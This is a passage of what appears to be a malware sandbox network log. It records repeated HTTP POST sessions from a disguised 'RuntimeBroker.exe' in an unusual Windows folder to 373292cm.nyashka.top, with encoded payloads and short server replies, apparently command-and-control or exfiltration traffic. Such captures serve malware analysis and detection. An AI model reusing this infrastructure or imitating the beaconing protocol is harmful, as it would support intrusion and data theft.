                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 26 55 29 1b 35 03 25 3b 01 0d 33 1d 2e 1e 2a 13 0d 10 29 2d 2a 04 24 01 36 04 25 3e 30 1c 24 2b 29 5a 2b 00 2e 50 32 06 27 59 2c 34 2b 5d 0c 13 22 5d 23 2a 04 59 32 02 01 03 29 3b 2c 05 35 02 39 04 28 03 2d 50 3f 2f 24 12 28 17 34 03 3c 5c 36 1f 2e 3b 25 15 2f 33 3a 1c 20 04 2b 52 0d 11 24 10 29 2e 21 1d 29 2d 27 5e 21 2b 30 07 27 2d 0f 08 31 0b 2e 52 24 29 3f 03 31 0b 25 50 33 57 35 1d 24 3b 35 07 25 06 36 0c 36 22 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: &U)5%;3.*)-*$6%>0$+)Z+.P2'Y,4+]"]#*Y2);,59(-P?/$(4<\6.;%/3: +R$).!)-'^!+0'-1.R$)?1%P3W5$;5%66"#T,"W3UV


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  68192.168.2.65710337.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:13.275933981 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2532
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:13.630062103 CET2532OUTData Raw: 5a 51 5c 5e 54 44 54 5d 5b 5f 5a 51 59 57 58 57 57 51 5d 53 57 5f 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZQ\^TDT][_ZQYWXWWQ]SW_SU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S./8!\7 =]*=$_?=%](, 3W $<_#^#=/.&F$.Y/
                                                                                  Jan 11, 2025 06:44:13.905131102 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:14.034415960 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:13 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  69192.168.2.65710437.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:14.168248892 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:14.520293951 CET2544OUTData Raw: 5f 53 5c 5e 54 43 51 5b 5b 5f 5a 51 59 53 58 5f 57 50 5d 5c 57 5e 53 5b 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _S\^TCQ[[_ZQYSX_WP]\W^S[\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.8##-X **3<>:+' R " Q<9##V6,&F$.Y/5
                                                                                  Jan 11, 2025 06:44:14.807893038 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:14.940356970 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:14 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  70192.168.2.65710537.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:15.072345018 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:15.426804066 CET2544OUTData Raw: 5a 56 5c 57 51 42 54 59 5b 5f 5a 51 59 54 58 50 57 59 5d 5f 57 5e 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZV\WQBTY[_ZQYTXPWY]_W^S\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S..#?"> ] 3>*'(>9Z<-/7<? !($4!X;&F$.Y/)
                                                                                  Jan 11, 2025 06:44:15.719676971 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:15.850136042 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:15 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  71192.168.2.65710637.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:15.981650114 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:16.332801104 CET2544OUTData Raw: 5a 55 59 54 54 41 54 59 5b 5f 5a 51 59 52 58 57 57 59 5d 5b 57 51 53 58 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZUYTTATY[_ZQYRXWWY][WQSX\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/ $"-'7#!Z)=4]<>)^+=#Y#,(#! W(9?#>;.&F$.Y/1
                                                                                  Jan 11, 2025 06:44:16.619368076 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:16.795833111 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:16 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  72192.168.2.65710737.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:16.931185007 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:17.285975933 CET2544OUTData Raw: 5f 54 5c 56 54 44 54 51 5b 5f 5a 51 59 55 58 50 57 5e 5d 5b 57 50 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _T\VTDTQ[_ZQYUXPW^][WPS_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/$"+ V)\*[0>==([?[7<(!!?97 1^/&F$.Y/-
                                                                                  Jan 11, 2025 06:44:17.569617987 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:17.700572014 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:17 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  73192.168.2.65710837.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:17.820477009 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:18.177826881 CET2544OUTData Raw: 5a 51 5c 53 54 44 54 59 5b 5f 5a 51 59 53 58 5e 57 50 5d 52 57 51 53 5a 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZQ\STDTY[_ZQYSX^WP]RWQSZ\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-8'A68^7 )#+5_<=4 #!0**$7 9..&F$.Y/5
                                                                                  Jan 11, 2025 06:44:18.468466043 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:18.606482029 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:18 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  74192.168.2.65710937.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:18.744658947 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  75192.168.2.65711037.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:19.043881893 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:19.395277023 CET1872OUTData Raw: 5f 51 5c 50 51 43 51 5a 5b 5f 5a 51 59 54 58 5e 57 5e 5d 52 57 5a 53 5e 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _Q\PQCQZ[_ZQYTX^W^]RWZS^\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-;3?!45]*?._?'"<0#!V(04^;>&F$.Y/)
                                                                                  Jan 11, 2025 06:44:19.690864086 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:19.822074890 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:19 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 25 0c 3d 35 0c 5c 32 38 3c 55 24 0a 2e 1d 29 5b 20 03 3e 03 2a 01 27 5e 21 5e 26 10 33 0d 24 15 26 05 2b 58 39 0b 25 06 30 01 2d 24 2b 5d 0c 13 21 04 23 2a 3a 11 31 3f 20 11 29 16 2c 07 36 02 21 01 28 03 21 54 28 06 3b 01 3c 17 09 11 3f 04 2a 1e 2c 01 26 06 2e 1e 29 08 34 14 2b 52 0d 11 24 55 3f 3e 39 54 28 2e 38 01 36 38 30 01 27 13 32 1d 24 32 39 0d 24 07 02 1f 26 0c 3d 51 24 21 07 51 26 05 2e 12 31 3f 26 09 36 18 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: %=5\28<U$.)[ >*'^!^&3$&+X9%0-$+]!#*:1? ),6!(!T(;<?*,&.)4+R$U?>9T(.8680'2$29$&=Q$!Q&.1?&6#T,"W3UV


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  76192.168.2.65711137.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:19.165081024 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:19.520464897 CET2544OUTData Raw: 5f 57 5c 53 54 45 54 5e 5b 5f 5a 51 59 53 58 55 57 50 5d 5e 57 59 53 5a 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _W\STET^[_ZQYSXUWP]^WYSZ\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-8'C#-" %)+<-*+=;[7?41?(*< 0;>&F$.Y/5
                                                                                  Jan 11, 2025 06:44:19.797525883 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:19.931071997 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:19 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  77192.168.2.65711237.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:20.055349112 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:20.410913944 CET2544OUTData Raw: 5f 56 5c 5f 54 48 51 5e 5b 5f 5a 51 59 51 58 50 57 5d 5d 5e 57 5d 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _V\_THQ^[_ZQYQXPW]]^W]S\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S./#?"-$] ),Y>>!_<> /W#"$<: 3";>&F$.Y/=
                                                                                  Jan 11, 2025 06:44:20.693500042 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:20.824189901 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:20 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  78192.168.2.65711337.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:20.953166962 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:21.306843042 CET2536OUTData Raw: 5a 52 59 52 51 42 51 59 5b 5f 5a 51 59 57 58 51 57 50 5d 58 57 5e 53 54 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZRYRQBQY[_ZQYWXQWP]XW^ST\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.X;00#>( +-+>](=[ '7W8P*9 7 8&F$.Y/=
                                                                                  Jan 11, 2025 06:44:21.581645966 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:21.710410118 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:21 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  79192.168.2.65711437.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:21.839039087 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:22.192125082 CET2544OUTData Raw: 5a 51 5c 57 54 49 51 59 5b 5f 5a 51 59 5f 58 5f 57 51 5d 5f 57 5d 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZQ\WTIQY[_ZQY_X_WQ]_W]SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.;">;40==\+>\?>7\"/<#,?*<439\..&F$.Y/
                                                                                  Jan 11, 2025 06:44:22.496242046 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:22.668924093 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:22 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  80192.168.2.65711537.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:22.788189888 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:23.145566940 CET2544OUTData Raw: 5f 55 5c 56 54 49 54 5c 5b 5f 5a 51 59 52 58 57 57 5a 5d 5c 57 58 53 58 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _U\VTIT\[_ZQYRXWWZ]\WXSX\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-80$5=?4*)[(^<X!_(-47?3 10+?" _,&F$.Y/1
                                                                                  Jan 11, 2025 06:44:23.417514086 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:23.550510883 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:23 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  81192.168.2.65711637.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:23.683778048 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:24.038718939 CET2536OUTData Raw: 5a 55 5c 5e 54 42 54 5b 5b 5f 5a 51 59 57 58 5f 57 5f 5d 52 57 5c 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZU\^TBT[[_ZQYWX_W_]RW\SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-; 6.#"0!X*=3<?=# !!V<(#,&F$.Y/
                                                                                  Jan 11, 2025 06:44:24.315583944 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:24.442516088 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:24 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


